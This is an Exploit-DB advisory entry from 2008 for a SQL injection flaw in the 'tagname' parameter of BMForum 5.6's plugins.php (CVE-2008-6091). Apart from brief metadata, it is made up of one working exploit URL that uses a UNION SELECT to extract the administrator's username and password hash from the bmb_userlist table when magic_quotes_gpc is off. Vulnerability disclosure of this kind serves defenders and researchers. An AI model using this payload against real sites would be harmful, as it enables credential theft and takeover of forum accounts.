BMForum 5.6 tagname Remote SQL Injection Vulnerability

2008-10-01T00:00:00
ID EDB-ID:6642
Type exploitdb
Reporter ~!Dok_tOR!~
Modified 2008-10-01T00:00:00

Description

BMForum 5.6 (tagname) Remote SQL Injection Vulnerability. CVE-2008-6091. Webapps exploit for php platform

                                        
                                            Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: BMForum
Version: 5.6
URL: www.bmforum.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit:

http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*

# milw0rm.com [2008-10-01]